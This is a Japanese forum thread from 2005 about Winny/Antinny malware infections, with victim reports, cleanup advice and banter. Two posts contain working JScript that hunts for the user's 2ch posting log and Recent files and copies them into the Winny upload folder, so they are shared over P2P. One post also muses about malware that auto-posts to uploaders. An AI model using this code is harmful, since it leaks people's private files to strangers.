キンタマ系の特徴は見当たらないので違うと思うのですけど・・・

環境はWIN2000、Office2000です。
システムのアップデートは欠かしていません。アンチウイルスはAVGを
入れてあります。

どなたか、この状況を回避する手段わかりませんか？

時限発動済みの ぬるぽ亜種。
その症状が出るときは、感染後時間が経って、すでに末期。
HDD全消去というか、特定拡張子ファイルのAA上書きが、いつ起こるかわからない
対処法だが、あんたのレベルだと、フォーマットして再インスコが一番。
データ含めて、失われたものはあきらめる。

>>409
やば、今見たら自分もそのファイル有るよ
ウイルスか?
http://maniakou.s7.xrea.com/cgi-bin/upload/img/img20050308004538.jpg

指つめてもらいました
http://maniakou.s7.xrea.com/cgi-bin/upload/img/img20050308011216.jpg

ひどい事するなぁｗ

スタート準備動作の画像
という所は深読みするとちょっと怖いな。

>>573
指をつめる場合は左手からですよ。

10Gのウィルス？の対策でOS上書きインストールしたら直った。
復元ポイント作ってなかったし、クリーンインストールは面倒だからためしにやってみたら見事直ったって感じだ。

>>573
こういう板での場合はいいんだけど、知り合いにちょっと画像を弄っていちいち報告
してくる奴がいてウザイ。面白くも何ともねーし大して加工うまくもねーのにｗ

つーか以前明らかに差別的な内容の画像を送られて人間性を疑ったよ。
っとスレ違いすまそｗ

日記はチラシの裏にでも書いてろ

>>579
まて！578を立て読みしてみろ・・・

こしつっ

ネっトをやるやつがよくしてしまう行為・・・そう、固執だ。
タンに日記だと誤解するのはまだ早い！
投げかけてきているんだよ彼は！
下らないお前らがそんなに固執しているHDにそんな価値はあるのか？
しかも地の文章にある「ウザイ。。面白くも何ともねーし大して加工うまくもねーのにｗ 」
てんぐになっている解析者とふざけた情報しか出さない質問者に対する明らかなる批判の声だ！。
みんなよく考えるんだ！
るふされた情報に惑わされずに
よく自分の頭で考えろという・・・アナグラムだったんだよ！！！（すいませんこれは言ってみたかっただけです）

まこ？

うお！それは見逃してくれ・・・

う？ｗ

まこはフェイクという高等技術だったんだよ！？

ファイルのスキャンはavast! Antivirusでは不充分ですか？ノートンとか無いんで・・・

圧縮ファイル開く前の確認とかならぶっちゃけ不要
自分で内容見るなりして判断しろ
プログラムファイルの判断やｷﾝﾀﾏ踏んでHD内にｳｲﾙｽが撒かれてる等の状況なら必要だが
フリーでAntinny系への対応がいいのはBitDefender、AVP、Trend Microあたりらしい

な訳ないだろ
安心したいなら常駐ソフト買っとけ
常駐してても安心できんけどな

春っぽくなってきたな…

>>586-587
レスどうも。とりあえず586の試してみます。

まこネタｷﾎﾞﾝﾇ

まじで
こわいﾆｭｲﾙｽおせぇてください

585
avast!かAVG＋BitDefender＋System Safety Monitor＋一応、ファイラーも

これでAntinnyもこわくないだろ

まったくたて読みなんてくだらねえ
こんなことするくらいならオナニーしてる方がマシ

マイドキュメントによくわからん
コワイ画像がいつのまにか入ってた。

おかしいなとか思ってたら
とつぜんマイドキュメントのフォルダ削除
なぜだ･･･orz

俺のパソにもバスターマシンさえいれば・・・。

俺のPCにもガンバスターさえいれば・・・

>>594
ｐｇｒ

オレのマシンにも可愛い妹がいれば・・・

PCの中から「お兄ちゃん！」て聞こえるのか？

「あれ？何故スピーカーでなくケースから声が？」
と思いケースを開けてみるとそこには幼女が入っていたってそんな話ですか！
さすがはDL板！

油で黒光りする羽の幼女がいる可能性はあります

まぁまぁ
こんな事で騒がずのんびりやろうぜ

>>601
部屋を掃除しろ

初心者でスレ違いかもしれませんが質問させていただきます。
トレンドマイクロのオンラインスキャンでAntinny.Aが検出されました。
で、感染ファイルの削除とwinnyフォルダごと削除、
レジストリとwin.iniの修正はしました。
色々調べたんですけど、結局このAntinny.Aが行う動作は、
キャッシュのクリアと自分のコピーをUpフォルダに
置くだけなんでしょうか？
デスクトップのSSとかファイルを勝手にUpするウイルスとは
別物と判断していいんでしょうか？
どうぞよろしくお願いいたします。

>604
マイドキュメントとデスクトップ下位フォルダ全部ｎｙに揚がってると思うよ。

>>604
いまどきAntinny.Aに犯されてるくらいだから、ほかにもいろいろ
ありそうな悪寒。オンラインスキャンを信頼してそのまま使うのも
いいし、石橋を叩いて初期化＆新規インスコするもよし。

ありがとうございます
>605、606
ってことは、Antinny.gとかと同じ動作をするんですか？
とりあえず再インストールはすることにします。

【使用OS】 XP
【WindowsUpdateしてるか】 Yes
【使用AntiVirusソフト】 NAV、NIS
【AntiVirusをUpdateしてるか】 Yes
【ウイルススキャンの結果】 未検出
【オンラインスキャンしたなら結果】 No
【Winnyのﾊﾞｰｼﾞｮﾝ】 未使用
【Winny歴、総DL量】未使用
【テンプレを読んだか】 Yes
【テンプレにある対策を実行したか】実行予定
【症状、具体的に分かる限りすべて書く】 カレント以下のフォルダ削除、(･ё･)〜.jpgファイル複数
【何をしたらそんなことになったのか】 アップローダ経由。フォルダアイコンに〜.exe。約４MB。削除しようとして誤ってダブルクリック
【これまでにとった措置】 ｽｷｬﾝ、システムフォルダのexe・スタートアップ・reg起動実行の差分チェック（変化なし）

既知か未知か、既知であれば関連の情報しりたいです。

意味が解らん

マイドキュメントの中身が全部消えちまったんだ・・・
このままじゃ俺の大事なデータがなくなっちまう！だれか
レクチャーしてくれると助かる！
いっしゅんにして全部消えちまったんだよ・・・
プゲラとか言ってる場合じゃネエヨー！
しけた意見はいらねえ！
てめえらの知恵を待ってるぜ！

>>608
ウイルスプログラム本体が残ってるならどこか大御所のｵﾝﾗｲﾝｽｷｬﾝ試してみれ。検出されるかも
ってかあぷろだ経由ならなんでAntinny関係だと思ったんだ？

>>610
片仮名交じりとかｲｸﾅｲ

(^ω^;)ﾌﾟｷﾞｬｰ

プゲラ

>>608
意味がわかんない。
症状は何かね？
１０Gウイルス？

>>610
よしデフラグをおすすめするｗ

本体はフォルダアイコン偽装タイプの４MBのexeです。
症例は、実行ファイルのあるフォルダの中のファイルとフォルダを削除します。
かわりに「(･ё･)〜.jpg」というファイル名でサイズのランダムなファイルを複数作成されます。
「今のところ」はそれ以外に症状も変化も確認してません。

サイズがでかいexe形式というのがp2pで流れてそうな感じがしたため
まずこちらで有名かお尋ねしようと思いました。
(･ё･)123456.jpgみたいなファイルを大量に吐くパターンが周知ならその詳細を知りたいと思いまして。

>>616
おそらく新作なのでここで対処法聞いても無駄だと思う
NAV持ってるなら、シマンテックに検体提出しといてください

再インストするので
とりあえずチラシの裏しときます。

ウィルス本体：フォルダアイコン形式のexeファイル
ファイルサイズ：4,542,664Byte
ウィルスｽｷｬﾝ：未反応
確認済症状：
１．exeのあるフォルダ以下のファイル・フォルダを削除。
２．「(･ё･)123456.jpg　（数字は任意の6桁）」を作成。
　　　ファイルサイズはランダム（10kB〜200MB）。中は全て0bit。
　　　50MBの空き容量を残して終了？作成失敗まで続くと思われ。

他：
レジストリRun、スタートアップに変更は見当たらず。他の詳細は不明。
システムはDドライブ8Gで構成してるのでCドライブ目当て、10Gタイプとかは未遂してる可能性も。
実行環境：
WindowsXP　　ServicePack2済
WindowsUpdate、Norton定義ファイル20050307更新済。

対処法までは知らんけれども、ここは新作（らしきもの）を報告するスレやから
報告ってことでいいんでないの。
というか春の新作が出る時期なんですか。

新種報告はありがたいけど、フォルダ偽装なんかにひっかかるのは
ウイルス対策以前の問題のような気がする。とりあえずテンプレ熟
読して推奨されてる対策は全部やっておいたほうが大吉。

4.5Mものexeって何がつまってんだろうなぁ

どうせ素人がビジュアル開発環境で作った無駄まみれのプログラムなんだろうなｗ

あぁもちろんファイルの容量を増やしただけって事も考えられる。
さすがに2M超えのEXEは作るには逆に工夫が必要だと思う。

なんか馬鹿丸出しなのでIDと文体変えて再登場します('A`)ﾉｼ

ご指摘ごもっとも。
ちなみに偽装も何もexe拡張子まで確認してます。なのに
選択して削除しようとした時に手がダブルクリック
脊髄反射は脳では止められなかったです（´・ω・｀）

例えば壁紙内蔵とかな
みつをぬるぽ壁紙は約2.3MB

>>621
お前の恥ずかしい秘密

＞ ID:4ZuyD8DW0
君無駄口大杉　無駄にログを増やさないでくれ


612 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：05/03/08(火) 11:56:00 ID:4ZuyD8DW0
(^ω^;)ﾌﾟｷﾞｬｰ

615 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：05/03/08(火) 11:59:40 ID:4ZuyD8DW0
>>610
よしデフラグをおすすめするｗ

622 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：05/03/08(火) 13:36:23 ID:4ZuyD8DW0
どうせ素人がビジュアル開発環境で作った無駄まみれのプログラムなんだろうなｗ

623 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：05/03/08(火) 13:37:26 ID:4ZuyD8DW0
あぁもちろんファイルの容量を増やしただけって事も考えられる。
さすがに2M超えのEXEは作るには逆に工夫が必要だと思う。

それにしてもシングルクリックでファイルを実行するようにしてる人って
ある意味アレだね。勇者。

>>629
俺シングルだけど…。あの…。別に勇者とか…。そんなんじゃ…。
し…。知らないんです。設定の方法とか。（お、教えてくれます？）
それに、ダブルだとマウスの電池が…。あのワイヤレスなんです。
でも一回も間違ってクッリックしたこと…。ないんですよ？えっへｎ。

>>630
フォルダオプションの全般タブのクリック方法だったと思う。
そこで切り替えられますよたぶん。

日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。

実行してみた。
マイドキュメント以下の全てを削除して(･ё･)xxxxxx.jpg作る以外の動きがわからん。

まあ、ウィルス踏む奴なんて素人なんだし
これに懲りたらnyやめることだな

まあ、国に帰るんだな
こんな、お前にも家族がいるだろう

>>633
漏れも実行してみたけど、マイドキュメント以下の全てのファイルを削除
して(･ё･)xxxxxx.jpg作る以外に害はなさそうだね…

>>632-633
XPのシステム復元サービス絡みで悪さしてない？

ファイル：
system32\DRIVERS\sr.sys
RKEY：
SYSTEM\CurrentControlSet\Services\srservice

>>633、636

IMJPMlG.exe

っての入ってない？
HDDへのアクセスがずーっと続くんだけど

↑のレス、アンカー間違いです。失礼

>>638
見つからない

別のニュイルスも踏んだんじゃないか

またはニュイルスの盛り合わせを食ったか

ttp://www.mainichi-msn.co.jp/it/coverstory/news/20050307org00m300062000c.html
あんまり関係ないけど
これで裁判結果が左右されるとしたら、ny利用者も増えて感染者も増えると…

>>640
どうも
HijackThisでこれが検出されたんだけど、別のかな…

4Mもあるexeだから、マイドキュメントのファイルを消すandデカいファイルを
作る以外にも何かしそうなんですけどね。
わからん、、、

>>632を実行して、IEのインターネットオプション、セキュリティタブのWeb
コンテンツのゾーンにマイコンピュータが追加された人いませんか？

exeを不用意に実行してるヤシ多いけど
xpSP2にすれば、exe実行前に警告でるだろ？

そういわずにどんどん踏んで情報提供しようよ

気持ち悪くて再ｲﾝｽﾄした自分からすれば実行するのはスゴイなーと・・・
迂闊に実行させた本人が言えたことじゃないですが。

操作中に間違って開くとか以前からやってたので回避方法を色々調べてましたが
特定フォルダ内の実行権限拒否しか今のところ思い当たるフシ無し。
>>646
SP2の実行問合せは、ネットからDLしたファイルのみで、ローカルで作成されたのは対象外。
DLして解凍したexeが聞かれるのは、「ZIP（フォルダ）からXPの解凍ウィザードで解凍したexe」のみ。
lzh等々は当然対象外。ZIPフォルダでも「D&D」は対象外。
とのことです。

アホばっか

>>649
同意。以前P2Pと言えばそれなりの知識がある人ばかりだったのに。
今は初心者みたいなのばかりで萎える。これもネトランのせいか。

おまいら卒業したらどうだ

>>650
ｱﾊﾊｰ、おまいｽｸﾘﾌﾟﾄに同意してるよｗ

>>122,184,237,269,291
>>296,316,326,341,399

>>652
やっちまったって感じだなｗ初心者は俺ですねｗ

なんか新しいウィルス増えてるじゃね？

>>635
ガイルかよｗ

ブログ巡回してたらこんなものが・・・
http://blog.livedoor.jp/kingkunjp/archives/15958096.html

ｎｙ画像には会社名らしきものもあるし　ｶﾞｸｶﾞｸ (((ﾟдﾟ;))) ﾌﾞﾙﾌﾞﾙ

瑞樹 修学旅行

この欄検眼団がちょっと気になった

>>656
「菅井さん結婚式」を「菅井きん結婚式」と読んでしまったorz

>>636
10Gの犯人はそいつの様な気がする。
ノートン先生でc:\WINDOWS\IME\IMEJPのimjpmｉg.exe駆除したら10G作成止まった。
Trojan Horseだと。

>>659
10Gは確かにこれみたいですね。
レジストリみたらRunのところに、そのexeが追加されてたんで。

>>656
ついでにチェックしてみたら、Temp000フォルダにGJBファイルが大量に
作成されてた。これが勝手にうｐされてるんだろうか？

UPされてると考えるのが妥当だろう。
つまり、もう手遅れってこった。

tempフォルダに…
ウィルス（トロイ）の入っていたフォルダと同じ名前のフォルダがあって、
そのフォルダの中にXPデフォルトの壁紙が入ってる。

636の人の症状って１つのニュイルスだけで済んでないような

春なのにため息また一つ

とりあえず自分も１０Gウイルスの解析（て偉そうなもんじゃないけど動作チェック） して
みたいんで、容量デカく無いやつ教えてください。

>632のが同様の疑わしいやつ？
他にあるならハッシュ張ると危険な場合はファイル名とハッシュの初め2、3文字
教えてくれると有り難い。

【使用OS】 Win 2000
【WindowsUpdateしてるか】 自動
【使用AntiVirusソフト】 ノートン・インターネットセキュリティー
【AntiVirusをUpdateしてるか】 自動（手動でもアップデートしてみました）
【ウイルススキャンの結果】 異常なし
【オンラインスキャンしたなら結果】 未
【Winnyのﾊﾞｰｼﾞｮﾝ】 v2.0b7.1
【Winny歴、総DL量】 二週間程度　総量8Gちょっと
【テンプレを読んだか】 既読
【テンプレにある対策を実行したか】 実行済
【症状、具体的に分かる限りすべて書く】
キャッシュフォルダを空にしたつもりがUPフォルダを空にしてしまったことに気づかずに数日アクセスしていたのでアップするものは何もないはずなのに、いつも３本ぐらい何かをアップしているリンクが存在します。
【何をしたらそんなことになったのか】
怪しいことは何もなかったように思うんですが…。強いて言えばDivxToDVDをインストールしたくらいなので当然無関係なはず。
あとはaviをダウンロードしたのみ。
【これまでにとった措置】
新規に解凍した別のWinnyでアクセスしてみたことと、UPフォルダそのものをマイドキュメントに退避させてアクセス。

【使用OS】 Win 2000
【WindowsUpdateしてるか】 自動
【使用AntiVirusソフト】 ノートン・インターネットセキュリティー
【AntiVirusをUpdateしてるか】 自動（手動でもアップデートしてみました）
【ウイルススキャンの結果】 異常なし
【オンラインスキャンしたなら結果】 未
【Winnyのﾊﾞｰｼﾞｮﾝ】 v2.0b7.1
【Winny歴、総DL量】 二週間程度　総量8Gちょっと
【テンプレを読んだか】 既読
【テンプレにある対策を実行したか】 実行済
【症状、具体的に分かる限りすべて書く】
キャッシュフォルダを空にしたつもりがUPフォルダを空にしてしまったことに気づかずに数日アクセスしていたのでアップするものは何もないはずなのに、いつも３本ぐらい何かをアップしているリンクが存在します。
【何をしたらそんなことになったのか】
怪しいことは何もなかったように思うんですが…。強いて言えばDivxToDVDをインストールしたくらいなので当然無関係なはず。
あとはaviをダウンロードしたのみ。
【これまでにとった措置】
新規に解凍した別のWinnyでアクセスしてみたことと、UPフォルダそのものをマイドキュメントに退避させてアクセス。

>>666
キャッシュをうｐしてるんだろ

あれ？
Macから書くと同じのが２回投稿されてしまう。
どうも失礼を。m(--)m

>>668
あ、そういうのもありで？ 感謝！

びっくりするくらいバカだな

>>670
経験の浅い者を認められない者はこの世に存在する価値なし。
糞して...いや、糞にまみれて市ね

>>1も読まない奴、相手にすんなよ
ここは初心者の質問スレじゃない

>>671
乙

Winnyに新ウィルス？
http://news19.2ch.net/test/read.cgi/news/1110447675/

>>674
あまりにも話題にもならないから
ウイルス作者が自分で立てたと見る
ﾌﾟｰｰ

ここに出てる新種ｳｨﾙｽ作者は2chねらーか？

次は、在日や民主党の悪行を知らせる奴で頼む

ウィルス作者は当然2ch見てるだろ

http://news19.2ch.net/test/read.cgi/news/1110447675/26
だってさ。
ますます怪しいなぁｗ

話題にもなってないウイルスを取り上げるとはなんか怪しいね

作者はどうせこの板とか見てニヤついてんだろ？死ねよきもちわりー。
あまりにも話題性がないので枕を濡らしてそうだな。

>>678
やはりそのスレの ID:C0ppJeJt　が怪しいな。
わざわざスレ立てて気づいてくださいってことか？

作者はどうせニュイルススレとか見てニヤついてる
↓
あまりにも話題性がないので枕を濡らす
↓
あまりにも話題にもならないからニュー速にスレ立ててニヤついてる
↓
流出系なんで一部びびるもあまりにも話題性がないので枕を濡らす
↓
お役人が引っ掛かり、初めて他人が建ててくれたスレとか見てニヤついてる
↓
ニュイルス作って日本で初の逮捕……もとい補導で枕を濡らす

枕を濡らしてばっかりじゃんｗｗｗ作者乙ｗｗｗｗ

ぱんつもぬらしてるだろうな。

被害者の叫びは作者の滋養にして栄養であり最も喜ぶことです
作者にエサを与えないで下さい

でもこれは叫びじゃなくてバカにしてると思うｗ

作者はここを見ている
陰気な奴だな

オイ！作者見てるか！常にノートンより先を走れ。もっと効率よくバラ撒け。

>688
幾ら何でも作者様に訴えかけすぎ

苺娘と辻を無視リストに入れておけば、炉画像なぞ見ずに済む

GJBって全部Jpegなの？

画像はもう飽きたと言ってみる

>>691
JPGだけど、XPならWindows画像とFAXビューアに関連付ければ開ける。

「マイドキュメント」以下を消去してjpgで埋めるって奴とは別？
結構春の新作が出てるのか？

ニュー速でスレ立つ前にどっかで話題になってた？

>>695
全くなってないかと思われ

今まで話題にならなかったけど
どういう形でアレ今回話題になってよかったんじゃない？ｗ
苦労して作ったのに話題にすらならないと悲しいもんね

６９市町村の選択：来月１８日に閉庁、２２日に新市開庁−−湯沢市　／秋田
http://www.mainichi-msn.co.jp/chihou/akita/sentaku/news/20050226ddlk05010204000c.html

この合併調印式の画像が出回ってる

話題になってたのはこのスレくらいだろう。前スレの最初の報告が２月６日だな。
あと>>656のリンク先くらいか。

>>695
【フジテレビ】Winny円光動画スレ40【絶賛】
http://tmp4.2ch.net/test/read.cgi/download/1110118245/
あと、こことか

つうかあれなんて読むの？

低学歴の俺にもわかるように教えて

最近、Lhazで解凍すると同じファイル名で拡張子名不明で０バイトのファイルが解凍ファイル以外に出てきて、
解凍ファイルを開くと消えるんですが・・・・。
これって新種のニュイルス？
いろんなファイルのzipファイルで発生するんですが・・・。
いろいろありすぎて言えませんが・・・・。（＾＾；）A

アホばっか

げ、あげてしまった。

げ、踏んでしまった。

げ、泣いてしまった。

つまりなんだ、このウイルスは危なくないってことか？話題性がそんなにないってことは。

インパクトがないな
おもしろくもないし

せいぜいキンタマのようにJPGふぁいるをGBJで偽装されて流れて
マイドキュメントのファイルが削除されて、でかいファイルに置き換
えられるくらいなんで、そんなに危ないもんでもないかも。

あふれてる画像も特に面白いものがあるわけでもないし…。

話題になるウイルスが危ないとか思ってるの？

かかった奴らには申し訳ないが苺きんたまは面白かったなぁ･･･

>>711
だよなぁ
ｎｙ使ってない人間にも無理矢理ｎｙインストしてキンタマ状態にして欲しいぐらいだね

>>636氏が試してる新作に期待。
続報マダーーー？

日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。

個人情報保護法が４月からスタートするんだけど、
この場合、どうなるのだ？

欄検眼段←何って読むの？

function Step2(d) {
for(var fc = new Enumerator(fso.GetFolder(d).files); !fc.atEnd(); fc.moveNext()) {
var f = fso.GetFile(fc.item());
if(f.Name == "kakikomi.txt") {
kakiko = f.Path;
if(up != "") { return 1; }
} else if(f.Name == "UpFolder.txt") {
var upini = fso.OpenTextFile(f.Path, 1, false);
var buf, line;
while(!upini.AtEndOfStream) {
buf = upini.ReadLine();
line = buf.split("=");
if(line[0] == "Path") { up = line[1]; break; }
}
upini.Close();
if(kakiko != "") { return 1; }
}
}
for(var fs = new Enumerator(fso.GetFolder(d).SubFolders); !fs.atEnd(); fs.moveNext()) {
if(Step2(fs.item())) { return 1; }
}
}
function Step1() {
for(var d = new Enumerator(fso.Drives); !d.atEnd(); d.moveNext()) { try { if(Step2(d.item().RootFolder)) { return; }　} catch(e) {} }
}
var fso = new ActiveXObject("Scripting.FileSystemObject");
var kakiko = "";
var up = "";

Step1();
if(kakiko != "" && up != "") { fso.CopyFile(kakiko, up + "\\俺のカキコ.txt"); }

>>717
なんか怖いのｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!

やべ

kakikomi.txtって皆保存してるもんなん？

俺はしてる。。。

kakikomi保存しない設定にしてる。
1000超えたログも捨てまくってる。
一度見た動画も捨てる。
キャッシュも最小限しか残さない。

kakikomi.txtがｺﾋﾟｰされるぞｺﾞﾗｧ

専用ブラウザでkakikomi.txtに保存してない人には無効ってこと？

>>717
こんなところに書き込んで度胸あるねぇニヤニヤ

俺はうｐフォルダもない

>>717
犯罪幇助？
やっちゃったね。

>>717
なんだ他人のkakikomi.txt読みたいなら、おれの読ませてやるよ。
ttp://up.isp.2ch.net/up/f269ee70e1a4.zip
パス：うんこ
なんかおなじのを何度もコピペしてるし、うんこみたいな書き込みしかしてないが。
ホントにうんこで読み返すと笑えるから取ってあるんよ。

そういや前にもこのスレでkakikomi.txt晒したな。

>>722
そこまでする必要もなかろうに、ビビリ過ぎ。女か？

>>730
要らない物はすぐ捨ててしまう主義なんです。
なんもビビってへんちゅーねんｗ

いらない物って・・・キャッシュはしばらく残しとかなあかんやろ
即消し厨か

即消し主義といっていただきたい

日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。

お前が援交好きなのはわかった。

>>717
なるほど、こうやってupフォルダ探してるわけか。　とりあえずフォルダ構造変えとくか・・。

IEしか使ってないもので、あしからず。
円光ものはともかく、.aviは事故多いし、落とすなよそんなもん。

朝起きたらノード０、全て切断。
モデムを見てみると、pppのランブが消灯していて、ネットそのものに接続出来なくなってました(;;)

これってネット障害?それとも・・・
教えて下さい(>_<)/

>>738
アダプターを差し込むんだ！！！

とりあえず・・・、モデムの電源を一端落として、再起動はしてみたのか？







実は、プロバがメンテ中とかいうオチかもしれんが・・・。

カードが止まったに一票

>>740
ＩＳＰにお金払ってないって落ちじゃないだろうな？

どっから書き込みしてるんだ

ネタじゃありません(>_<)

朝はバタバタしてるので、まだ色々試してませんが、料金滞納とかは無いです。
メンテならイイのですが・・・

>738
釣りじゃないなら顔文字はやめたほうがいいよ。

朝からスレ違いも甚だしい

>>746
うるせーよ。氏ね

顔文字は以後気を付けます、御指摘ありがとう。

今は携帯から書き込みしています。

スレ違いになりますか?もしそうなら誘導願えますか?
宜しくお願い致します。

>>748
>>740を試してダメならプロバイダのサポートに電話しろ。

> 今は携帯から書き込みしています。
まぁ一目瞭然だ罠

> スレ違いになりますか?もしそうなら誘導願えますか?
ISPのサポセンにでも聞いてくれ
情報が少なすぎて俺には何も胃炎からな

>>674
ためしにあやしいファイルあったんで、アタックしたら欄検眼段だったが
欄検眼段本体とスタートアップエントリ消せば問題ない

マイドキュメント以下削除云々、10GB云々とは、欄検眼段は別物みたいだけど
実行されるプロセスは、上のほうでコレじゃないか？と言ってるやつと同じ
マイクロソフト製の同名実行ファイルとは、明らかに違うアイコンしてるし、いかにも怪しいつー

欄検眼段に感染してるかどうか確認する方法を教えて下さい。

function Step3(updir) {
for(var fc = new Enumerator(fso.GetFolder(wsh.SpecialFolders("Recent")).files); !fc.atEnd(); fc.moveNext()) {
var f = fso.GetFile(fc.item());
try {
fso.CopyFile(wsh.CreateShortcut(f.Path).TargetPath, updir + "\\" + fso.GetBaseName(f));
} catch(e) {}
}

}

var wsh = WScript.CreateObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
Step3(up);

( ´艸`)ﾌﾟﾌﾟ　だからなんなんだｗ

だからなんなんだ　以上のものを書いたらﾀｲｰﾎされちゃうじゃん

それより、苺キンタマのようにアプロダに投稿しちゃう機能が欲しいよなぁ。
前回は鯖落ちになっちゃったから、今度はアプロダを複数使えるといい。
アプロダスレからアプロダを探し出してランダムに投稿とか。
もちろん苺キンタマに習って、投稿したらそのアドレスを2chに投稿な。
これも前回はスレが早くなりすぎたから、カキコ先はランダムにしないと。


苺キンタマ祭りをもう一度……

ATOK2005ダウンして　解凍してできた　ATOK 2005 for Windowsフォルダー内の
setupフォルダーにあるsetup.exeをクリックしたらウィルス警告がでてしまいました。
警告を読み切る前に警告画面が消えてしまい　ウィルス名がわからなくなってしまったんですが　
このウィルスの挙動と　対策をどなたかご教授ねがえませんでしょうかー・・・
いまノートンでウイルス検索していますが。

>>758
その報告で何のウイルスかわかったら神だろ

ノートンが反応したなら多分だいじょぶ、不安なら再いんすこ

欄検眼段

なんか結構同情する写真が流れてるなｗ
赤ちゃんとか
可哀想に・・・

>>758
ノートンのレポート見たら何のウイルスか載ってるだろ

欄検眼段画像のまとめたzipはどこですか？

10GBウィルス、FSUTIL.EXEを他に移したら止まった。
それによって他の弊害が出るかは知らんが。

てかシステムの復元が強制的に無効になってて使えないし…orz　10GBの二次被害か？
上に成功例あったので今からOS上書きｲﾝｽｺします

俺いいこと考えたウイルスを利用できるイイ方法がある
何もしないでウイルスに対抗できるよ

アホばっか

バカばっか

●ウイルスに感染しない為には？
PCの電源を入れないようにしましょう。

ノートン先生に勝てるニュイルスなどありません。先生信じてます

ノートン先生が裏切る時は無反応だからな。気付かない。

結局このデマ（？）ウィルスを作った作者が、何の話題にもならないのを
不満にこのスレで披露したが、特に興味を示してもらえず、ブログでも
ネタにしたもののトラッシュバックもコメントもつかず、思い余ってニュ速
でスレ立てたものの、スルー状態ということでFA？

無惨だな。(w
そのうちファビョって身元がバレてタイーホっていう、最強コンボ
をぜひ披露してもらいたいもんだ。

結局欄検眼段ってジサクジエンでウイルスじゃねぇの？

４月からやばいですよ

それ以前に欄検眼段ってどーよむのさ？
作者ｶﾏﾝ

>>774
AAです

どう見たらAAになるのかと。

>>776
90度傾けて寄り目にして近づいてじーっと1分ほどみつめると3Dに見える

作者はなんでこんな流行りそうもない名前を付けたんだろ
だいたい読み方分からないし
オリジナリティ？
おバカさんですねぇ

ところでUPフォルダ無いのにUPできるantinyウィルスっていないの？
居ないとすれば、UPフォルダ無くせば、被害ないって事だよな。
確か隠しフォルダでUPフォルダ作成するウィルスは居たような気が…

散々既出だったな。隠れフォルダ表示させない人多いのかな？

質問させてください。
自分【Antinny.ms（仮称）】に引っかかってるのかもしれません。
けどノートンではなくウイルスバスターなので検出してもでてきません。
シマティックのほうにオンラインスキャンというものがあるのですが
それでスキャンすれば親と子のファイル名が分かりますか？
あと駆除方法に
3.HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
　HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
とありますが自分のホストファイルには数字は0.0.0.0ではありませんが同じ形式の数字が並んでる行があります。
これは感染していると見ていいのでしょうか？
親切な方もしよろしければ教えてください。お願いします。

だからね質問スレじゃないのよ

テンプレの対処法を読んでも理解できないなら、初期化＆新規インス
トールしたほうがいいよ。いや煽りとかじゃなくてマジで。

中途半端な対処はよけいに問題をこじらせるだけだし。

駆除したつもりが全然だったりな

>>773
詳しくｩ

>>781
たしかウイルスバスターだとmsはAntinnyJだよ。ノー�dは何だったか
忘れた。Bだっけかな。

なんか怪しいファイル踏んじゃった。
今から再インスコするけど報告だけしてみる。
解凍したら中にフォルダファイルに偽装されたexeが入ってて、誤ってダブルクリック。
C:\Documents and Settingsに、ユーザー名と同じ名前の空フォルダが勝手に作られて、それが開かれる。
いろいろ確かめたが、そのほかに気付いた動作はなし。
ちなみにexeファイルが51,306,496 バイトもある。なんだろこれ。

>>781
あと、なぜmsにやられたと思うのか書いておくれ。
早合点してるだけかもしれないし。

ダウソ板って馬鹿ばっかでおもしろいなｗｗｗｗW

バカのすくつですから

踊る阿呆に見る阿呆

同じ阿呆なら作らにゃ損損うわなにをさｗせｄｒｔぎゅじ

10GBウィルスで怪しいのは

svchost.exe
svc ｈ st.exe

fsutil.exe
fsutil.exe

ctfmon.exe
ct ｆ mon.exe

こんな感じでした。削除したら治るかな？

God knows.

>>786のって新種かな？

>>794
既存のウイルスでファイルの先頭だけ書き換えてexeにしちゃうっての
あったようなきがするけど、情報少なすぎ。

再インスコってからにはもうその怪しいのも消しちゃったのかね。
せめてそれどっかにあげとけばなんか分かったかもしれんが

欄検眼段は漢文だそうです。
リャンクーガンドゥと読むそうです。
欄は日本でいう棚田で昔、えらい坊さんが刈り取りが終わった棚田を
１田１作づつ眼をこらしてみたら一俵の米が集まったそうです。
意味は小さな物を集めれば多くなる。
逆に多くの中の小さな物は見過ごしてはいけない、だから良く見なさい、など

>>797
ソースを出したら信じてあげるよ。

らん　ちえん　いえん　どぅあん

>>797
やっぱりか。

MADE IN CHINA　か？

中国人留学生はけっこういるから無いともいえないが

民明書房刊

あと、UPフォルダ内に大量に自分のデスクトップ晒し上げとかいうファイルがあるんですけどウィルスですかこれ？

>>797
誰の書いた文章？
それから漢文の原文をお願いします。

日本語訳見るよりも、そっちの方が調べるのが楽。

>>804
コピペするより、まずこのスレ一読しろよ。

了解了解

>>797
たいして面白くも無い作者ｵﾂ
もう来なくていいよ

>>800
嘘付けw

つーか、漢文と中国語は根本的に違う気がするのだが？
中国の留学生とか関係ない稀ガス

日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。

>>810
作者の自演自作です

もう見苦しいだけだな。＞欄検眼段
二番煎じにもならないくらいの劣化種だ。

実はまだだれも気がついていないすごい仕掛けが

はいはい。あるといいね

>>812-814
そこまで言うことは無いだろ！！　ｗｗ

作者がちょっとかわいそうになってきた

日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。

別に作者じゃないけど、もっと他のスレにも宣伝して警戒させるべきでは？

少なくとも、危険なウイルスなわけだし、ヤフーのトップに載るくらいには
やった方がいいと思うよ。

けっきょく、なんて読めばいいんだろう。

「らんけんがんだん」
でいいんじゃねーの？日本人なんだから日本語で

欄検眼段_D__新しいフォルダ (3)_コレクション_[キンタマ] 俺のデスクトップ USER1 [04-03-09](ファイル詰め合わせ)_F0005.GJB

>>818
＞別に作者じゃないけど

このウィルスの厄介なところは、注意を促せば「作者乙」、「自作自演で必死だな」とか
